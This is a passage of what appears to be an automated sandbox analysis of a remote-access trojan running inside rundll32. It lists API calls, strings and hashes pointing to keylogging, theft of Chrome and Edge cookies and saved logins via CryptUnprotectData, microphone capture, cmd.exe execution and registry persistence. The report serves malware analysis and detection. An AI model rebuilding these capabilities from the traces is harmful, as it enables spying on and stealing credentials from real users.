                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,02B2DD01,?,?,?,00000001,00000000,?,00000001,02B2DD01,02B2DD01), ref: 02B51179
                                      • __alloca_probe_16.LIBCMT ref: 02B511B1
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,02B2DD01,?,?,?,00000001,00000000,?,00000001,02B2DD01,02B2DD01,?), ref: 02B51202
                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,02B2DD01,02B2DD01,?,00000002,00000000), ref: 02B51214
                                      • __freea.LIBCMT ref: 02B5121D
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02B01BF9
                                      • waveInOpen.WINMM(02B72AC0,000000FF,02B72AA8,Function_00001D0B,00000000,00000000,00000024), ref: 02B01C8F
                                      • waveInPrepareHeader.WINMM(02B72A88,00000020), ref: 02B01CE3
                                      • waveInAddBuffer.WINMM(02B72A88,00000020), ref: 02B01CF2
                                      • waveInStart.WINMM ref: 02B01CFE
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 02B4F363
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02B4F386
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02B4F3AC
                                      • _free.LIBCMT ref: 02B4F3BF
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02B4F3CE
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02B66468,00000000,00000000,02B0D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02B1C430
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02B1C44D
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1C459
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02B1C46A
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1C477
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02B11170
                                      • int.LIBCPMT ref: 02B11183
                                        • Part of subcall function 02B0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02B0E0D2
                                        • Part of subcall function 02B0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02B0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02B111C3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02B111CC
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B111EA
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID:
                                      • API String ID: 2536120697-0
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,00000000,02B3BC87,00000000,00000000,?,02B3BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02B4829E
                                      • _free.LIBCMT ref: 02B482D3
                                      • _free.LIBCMT ref: 02B482FA
                                      • SetLastError.KERNEL32(00000000,?,02B05103), ref: 02B48307
                                      • SetLastError.KERNEL32(00000000,?,02B05103), ref: 02B48310
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      APIs
                                      • _free.LIBCMT ref: 02B509D4
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B509E6
                                      • _free.LIBCMT ref: 02B509F8
                                      • _free.LIBCMT ref: 02B50A0A
                                      • _free.LIBCMT ref: 02B50A1C
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      APIs
                                      • _free.LIBCMT ref: 02B44066
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B44078
                                      • _free.LIBCMT ref: 02B4408B
                                      • _free.LIBCMT ref: 02B4409C
                                      • _free.LIBCMT ref: 02B440AD
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02B13ABC
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02B13AEB
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02B13B8B
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]
                                      • API String ID: 3554306468-4262303796
                                      APIs
                                        • Part of subcall function 02B0C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02B0C559
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02B0C6EC
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02B0C757
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 02B0C6D2
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02B0C704
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      APIs
                                        • Part of subcall function 02B0C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02B0C4F6
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02B0C61D
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02B0C688
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 02B0C603
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02B0C635
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A27D,?,00000000,00000000), ref: 02B0A1FE
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A267,?,00000000,00000000), ref: 02B0A20E
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A289,?,00000000,00000000), ref: 02B0A21A
                                        • Part of subcall function 02B0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                        • Part of subcall function 02B0B164: wsprintfW.USER32 ref: 02B0B1F3
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      APIs
                                        • Part of subcall function 02B0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                        • Part of subcall function 02B0B164: wsprintfW.USER32 ref: 02B0B1F3
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 02B0AF6E
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 02B0AF7A
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A295,?,00000000,00000000), ref: 02B0AF86
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02B06A82
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B06A89
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02B05159), ref: 02B05173
                                      • CloseHandle.KERNEL32(?), ref: 02B051CA
                                      • SetEvent.KERNEL32(?), ref: 02B051D9
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B0E833
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      Strings
                                      • C:\Windows\SysWOW64\rundll32.exe, xrefs: 02B076C4
                                      • API ID:
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                                      • API String ID: 0-2837366778
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000001,00000000,02B752D8), ref: 02B1381F
                                      • RegSetValueExW.ADVAPI32(02B752D8,?,00000000,00000001,00000000,00000000,02B752F0,?,02B0F823,pth_unenc,02B752D8), ref: 02B1384D
                                      • RegCloseKey.ADVAPI32(02B752D8,?,02B0F823,pth_unenc,02B752D8), ref: 02B13858
                                      • API ID: CloseCreateValue
                                      • String ID: pth_unenc
                                      • API String ID: 1818849710-4028850238
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02B0DFB1
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02B0DFF0
                                        • Part of subcall function 02B35640: _Yarn.LIBCPMT ref: 02B3565F
                                        • Part of subcall function 02B35640: _Yarn.LIBCPMT ref: 02B35683
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B0E016
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02B16130
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      APIs
                                      • TerminateThread.KERNEL32(02B0A27D,00000000,02B752F0,pth_unenc,02B0D0B8,02B752D8,02B752F0,?,pth_unenc), ref: 02B0B8BB
                                      • UnhookWindowsHookEx.USER32(02B750F0), ref: 02B0B8C7
                                      • TerminateThread.KERNEL32(02B0A267,00000000,?,pth_unenc), ref: 02B0B8D5
                                      • API ID: TerminateThread$HookUnhookWindows
                                      • String ID: pth_unenc
                                      • API String ID: 3123878439-4028850238
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 02B014B9
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B014C0
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 02B01414
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B0141B
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                      • Instruction ID: a765b11bb7d2c3417619cd7afb31b5dc1bb17d8aaa4c80c5cd8c5ff612cf6948
                                      • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                      • Instruction Fuzzy Hash: 21A17771A803869FDB21CF58C8E07AEBBE1EF15304F2441EDD9859B281CB399981EB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 3222fb71e6cc92309c0d1b904a0a0f9e88b85f7819047024eb0307947f6c1343
                                      • Instruction ID: 5740055c3f9388e20b2e0ebee3ad3da4d6b427b139023320738ef1fbd85a953f
                                      • Opcode Fuzzy Hash: 3222fb71e6cc92309c0d1b904a0a0f9e88b85f7819047024eb0307947f6c1343
                                      • Instruction Fuzzy Hash: 1141F931A005246BDB257BB98CC4B6E3BADDF05770F944AD5FD24DE1D0EF7488405AA1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7890a59d5a50c041b21345568fb40e9568104a89163b70efe87e3e55314795d5
                                      • Instruction ID: 0c9b8a39825acaa52a6c758d4605759dc96f2973b9d1e066164762627f69fbab
                                      • Opcode Fuzzy Hash: 7890a59d5a50c041b21345568fb40e9568104a89163b70efe87e3e55314795d5
                                      • Instruction Fuzzy Hash: 12412E71A00314AFD724AF78CC81B5EBBEAEF84710F1045AAF945DB690DB71E541AB90
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,02B74F50), ref: 02B04DB3
                                      • CreateThread.KERNEL32(00000000,00000000,?,02B74EF8,00000000,00000000), ref: 02B04DC7
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02B04DD2
                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 02B04DDB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3360349984-0
                                      • Opcode ID: dd1b059ef0136b1820c80efc8a510ab82df37d7ba1bb6425fa2eaf8e25833c86
                                      • Instruction ID: 354483f4f56e7943b44fe3d808200221a8a80a15d3762c07666a367d97cac670
                                      • Opcode Fuzzy Hash: dd1b059ef0136b1820c80efc8a510ab82df37d7ba1bb6425fa2eaf8e25833c86
                                      • Instruction Fuzzy Hash: 2841A271548341AFC716EB65CD94EBFBFEEAF84350F44099DF996831D0DB209908CA62
                                      APIs
                                      Strings
                                      • Cleared browsers logins and cookies., xrefs: 02B0C0F5
                                      • [Cleared browsers logins and cookies.], xrefs: 02B0C0E4
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 071bbf5002226da2ca61d463133e794f192f5c867e1c30f014d82c67b3cc44d2
                                      • Instruction ID: 604e50590f384f4a99b03e754f1a4250052e9a00c6042b8a0a327d6fd43d5aed
                                      • Opcode Fuzzy Hash: 071bbf5002226da2ca61d463133e794f192f5c867e1c30f014d82c67b3cc44d2
                                      • Instruction Fuzzy Hash: A331B5057483C06EEA136BB454D6BAA7F838F93648F4846DEACD50B3D2EB56440CD7A3
                                      APIs
                                        • Part of subcall function 02B1C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1C561
                                        • Part of subcall function 02B1C551: GetWindowTextLengthW.USER32(00000000), ref: 02B1C56A
                                        • Part of subcall function 02B1C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02B1C594
                                      • Sleep.KERNEL32(000001F4), ref: 02B0A573
                                      • Sleep.KERNEL32(00000064), ref: 02B0A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: 1cc0ab310d278b997b63c958291dc8d27a003e33ed68dbbb23897a8f99fb4cb4
                                      • Instruction ID: c619cf8544f1d8e7f0ded8bf7d924acd18b55ad9c6659611fcf48c2b0ec2a45f
                                      • Opcode Fuzzy Hash: 1cc0ab310d278b997b63c958291dc8d27a003e33ed68dbbb23897a8f99fb4cb4
                                      • Instruction Fuzzy Hash: CF11A1315143005BC61AB778CC929AF7FBAAF51300F80099DE697564E2FF65EE08CAD2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2354b39ba0f1631b092c0bb78c0bc05187a30f1878d04f2734f6ceadc9cf6f4d
                                      • Instruction ID: 2c9b030398360243a420eb0646c1ca3f373f75bf895046b4e625157ddee8e580
                                      • Opcode Fuzzy Hash: 2354b39ba0f1631b092c0bb78c0bc05187a30f1878d04f2734f6ceadc9cf6f4d
                                      • Instruction Fuzzy Hash: 8C01A2B3A497167EFA2129786CC0F6B279DDF417B8B3807E7B531621D0DF608C5069A0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d50d413c9a5fe71375f5cd57b5cd137e2fdb7a75efcceb397d61dec09e0cd0a9
                                      • Instruction ID: 2f089eecb870167616fcc339a855c234450d7b0c120126774e124afb139eb47e
                                      • Opcode Fuzzy Hash: d50d413c9a5fe71375f5cd57b5cd137e2fdb7a75efcceb397d61dec09e0cd0a9
                                      • Instruction Fuzzy Hash: 2E01D6B26096117EEA2129786CC4F37638DDF413F933C47E6F531521E4DF608D01A5A0
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02B0A74D), ref: 02B0A6AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02B0A74D), ref: 02B0A6BA
                                      • Sleep.KERNEL32(00002710,?,?,?,02B0A74D), ref: 02B0A6E7
                                      • CloseHandle.KERNEL32(00000000,?,?,?,02B0A74D), ref: 02B0A6EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID:
                                      • API String ID: 1958988193-0
                                      • Opcode ID: 2d8f116859623f415204e8322b2e9e4f52f13beb12aae28ea0181f4f536757c7
                                      • Instruction ID: fccce74b547790c59eab25c94dd39f5376a3b835de3901fb3c035fd50216dd8a
                                      • Opcode Fuzzy Hash: 2d8f116859623f415204e8322b2e9e4f52f13beb12aae28ea0181f4f536757c7
                                      • Instruction Fuzzy Hash: 4E110A30A84750EEE633A76494E8A6E3F7AFB41395F440C88E38247AC1C75168E4C755
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,02B4850D,00000000,00000000,00000000,00000000,?,02B48839,00000006,FlsSetValue), ref: 02B48598
                                      • GetLastError.KERNEL32(?,02B4850D,00000000,00000000,00000000,00000000,?,02B48839,00000006,FlsSetValue,02B5F160,02B5F168,00000000,00000364,?,02B482E7), ref: 02B485A4
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02B4850D,00000000,00000000,00000000,00000000,?,02B48839,00000006,FlsSetValue,02B5F160,02B5F168,00000000), ref: 02B485B2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: dcc00aa3d640a48a8a994a8262b1dd5b3c39f8fbeb809bbb0a9fc09754b561fd
                                      • Instruction ID: 0284096b243dbe8eb5f40569870fd2580c69ac79ffabf132e8f6a48ad4750aa6
                                      • Opcode Fuzzy Hash: dcc00aa3d640a48a8a994a8262b1dd5b3c39f8fbeb809bbb0a9fc09754b561fd
                                      • Instruction Fuzzy Hash: 5101F732A46732DBCB214A789C84B577B9AEF05BE1B150A64FD06DB241DF20D910CBE0
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 02B1C4B2
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B1C4D7
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1C4E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 672713a667fa6dfa37a0f21ec36080d367f469190c930c69e33c40c9575eabe9
                                      • Instruction ID: 721c9a7526d333cd0f7359d38892afcc271fc96a74c77484f87d03ab258a4e81
                                      • Opcode Fuzzy Hash: 672713a667fa6dfa37a0f21ec36080d367f469190c930c69e33c40c9575eabe9
                                      • Instruction Fuzzy Hash: B9F0F6B1286318BFF7111B25ACC5FBF3B5CEB866A4F00056AF942E71C0CB254D058572
                                      APIs
                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02B1C1F5
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02B1C208
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02B1C233
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02B1C23B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 39102293-0
                                      • Opcode ID: 0937d70ce51a0265eb02a370ee238ead61a1fbf111abe1a7c8644fb7b43e5400
                                      • Instruction ID: 2eb156b3af787db6caaee37b1aa08a9af83458122ebc2534a6079ea0fb7cce60
                                      • Opcode Fuzzy Hash: 0937d70ce51a0265eb02a370ee238ead61a1fbf111abe1a7c8644fb7b43e5400
                                      • Instruction Fuzzy Hash: 480126B16C0725EBE61552949C89F77BB7CDB44AD1F4000E2FA84D3190EF608D4186F2
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 02B3987A
                                        • Part of subcall function 02B39EB2: ___AdjustPointer.LIBCMT ref: 02B39EFC
                                      • _UnwindNestedFrames.LIBCMT ref: 02B39891
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 02B398A3
                                      • CallCatchBlock.LIBVCRUNTIME ref: 02B398C7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction ID: 3875fcfb0b56de8febc95caa4a4c05bffd521bcfcc6921f9012dd3a08e52a50c
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 2B01D332000509FBCF12AF55CD00EEA3BBAEF99754F1581A4F95866120C7B6E8A1DFA1
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 02B193F0
                                      • GetSystemMetrics.USER32(0000004D), ref: 02B193F6
                                      • GetSystemMetrics.USER32(0000004E), ref: 02B193FC
                                      • GetSystemMetrics.USER32(0000004F), ref: 02B19402
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID:
                                      • API String ID: 4116985748-0
                                      • Opcode ID: 2d38664bc8556f7550a9d985a918eb3ace67ef39453976cd273c04bf52d0f604
                                      • Instruction ID: 77a2159bca825388a7f03cd63357399c533dea63e72826f8750b893483d6bfec
                                      • Opcode Fuzzy Hash: 2d38664bc8556f7550a9d985a918eb3ace67ef39453976cd273c04bf52d0f604
                                      • Instruction Fuzzy Hash: 68F0C2B1F003554BD750EA759CA1B2F6BD6EBC4260F1408BEE2088B281EEB4DC058BC1
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02B38F31
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02B38F36
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02B38F3B
                                        • Part of subcall function 02B3A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02B3A44B
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02B38F50
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction ID: 8bda8faf6d720e4ae7890d28e00bfd3ff8fe80c45ec7ac4d1c6a14140510a8dd
                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction Fuzzy Hash: 90C04C05040681551D5376B021443AD33475F623947E498D5ECE4970028B06001A5D37
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 02B42CED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
